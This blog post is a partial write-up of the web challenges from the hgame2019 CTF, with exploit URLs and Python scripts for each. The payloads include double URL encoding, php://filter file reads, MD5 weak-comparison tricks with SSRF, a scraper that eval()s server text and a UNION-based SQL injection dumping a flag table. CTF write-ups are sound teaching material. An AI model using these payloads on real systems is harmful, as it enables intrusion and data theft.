iloveflag-blog

hgame2019 partial web write-up

2019/02/22

Level-week 1

Who ate my flag:

The challenge hint points to a leaked vim swap file:
vim -r http://118.25.111.31:10086/.index.html.swp

Header swap battle:

very easy web:

Bypass using double URL encoding:
http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572
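The id value above decodes to %76%69%64%61%72 after one pass and to vidar after a second. As an added example (not from the original write-up), the Python below contrasts a filter that checks before the second decode with one that canonicalizes first; the blocklist entry and all function names are assumptions.

```python
from urllib.parse import unquote

MAX_LAYERS = 5  # assumed cap on nested encodings


def canonicalize(value, max_layers=MAX_LAYERS):
    """Percent-decode until stable; return (canonical_value, layers_removed)."""
    for layers in range(max_layers + 1):
        decoded = unquote(value)
        if decoded == value:
            return value, layers
        value = decoded
    raise ValueError("too many encoding layers")


def naive_filter(param, blocked):
    """Flawed order: blocklist check first, second decode afterwards."""
    if param in blocked:
        return None
    return unquote(param)


def strict_filter(param, blocked):
    """Reject anything still encoded after the server's decode, then check."""
    try:
        value, layers = canonicalize(param)
    except ValueError:
        return None
    if layers > 0 or value in blocked:
        return None
    return value


# Constructed sample: the id value from the URL above
RAW_ID = "%2576%2569%2564%2561%2572"
# The web server decodes the query string once before the application sees it
SEEN_BY_APP = unquote(RAW_ID)
BLOCKED = {"vidar"}  # assumed blocklist entry for this illustration

if __name__ == "__main__":
    print(SEEN_BY_APP)
    print(canonicalize(RAW_ID))
    print(naive_filter(SEEN_BY_APP, BLOCKED))
    print(strict_filter(SEEN_BY_APP, BLOCKED))
```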

can u find me?:

Level-week 2

easy_php:

http://118.24.25.25:9999/easyphp/img/index.php?img=php://filter/read=convert.base64-encode/resource=….//flag

some php tricks:

MD5 loose (weak-type) comparison plus SSRF:
http://118.24.3.214:3001/?str1=240610708&str2=s878926199a&str3[]=240610708&str4[]=s878926199a&H.game[]=10000e&url=http://@127.0.0.1:80@www.baidu.com/admin.php?filename=php://filter/read=convert.base64-encode/resource=flag.php

baby-spider:

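1. If the request headers are not spoofed, the tenth POST returns shutdown code.

2. CSS styling means the question the crawler downloads is not the one actually displayed.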

```python
import re

import requests

# Spoofed browser headers sent with each answer
header = {
    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
    "Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8",
}

url1 = "http://111.231.140.29:10000"
session = requests.Session()
data1 = {
    'token': 'PBbMpC54RK0j4s5eZhakGwBQN5Yz7DOV'
}
# Log in with the token so the session cookie is set
r1 = session.post(url1, data=data1)

url2 = "http://111.231.140.29:10000/question"
r2 = session.get(url2)
demo = r2.text
# Pattern as it appears on the page; the markup around the capture group is
# missing, so it must be restored to match the element that wraps the expression
rst1 = re.search('(.+?)', demo)
if rst1:
    # Drop the last two characters, then evaluate the expression.
    # eval() executes the server-supplied text as Python.
    go = eval(rst1.group(1)[:-2])

url3 = "http://111.231.140.29:10000/solution"
for i in range(10):
    data2 = {
        'answer': go
    }
    # Submit the answer and read the next question from the response
    r3 = session.post(url3, headers=header, data=data2)
    demo2 = r3.text
    rst3 = re.search('(.+?)', demo2)
    if rst3:
        go = eval(rst3.group(1)[:-2])
    print(demo2)
    print(go)

# Final submission
dataflag = {
    'answer': go
}
flag = session.post(url3, headers=header, data=dataflag)
print(flag.text)
```

Partial solution; the second bypass is not completed.

Level-week 3

```python
import hashlib

import requests

url = "http://118.89.111.179:3000"
cookie = {'PHPSESSID': 'bcsjkikm26hfpfq502ogcklf6d'}


def getcode():
    rlt = requests.get(url, cookies=cookie)
    print(rlt.text)
    # The 4-character code sits at a fixed offset near the end of the page
    code = rlt.text[-18:-14]
    # Brute-force an integer whose MD5 hex digest starts with that code
    for i in range(0, 9999999):
        if hashlib.md5(str(i).encode()).hexdigest()[0:4] == code:
            answer = str(i)
            break
    print(answer)
    return answer


def sqlcode(go):
    # Solve the code check first, then send the payload in the id parameter
    answer = getcode()
    url1 = url + "/?code=" + answer + "&id=" + go
    r = requests.get(url=url1, cookies=cookie)
    print(url1)
    print(r.text)


# Get the database name
a = "1 union select database()#"
# Get the table names
b = "1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#"
# Get the column name
c = "1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)%23"
# Read the flag column
d = "1 union select f14444444g from hgame.f1l1l1l1g"
sqlcode(d)
```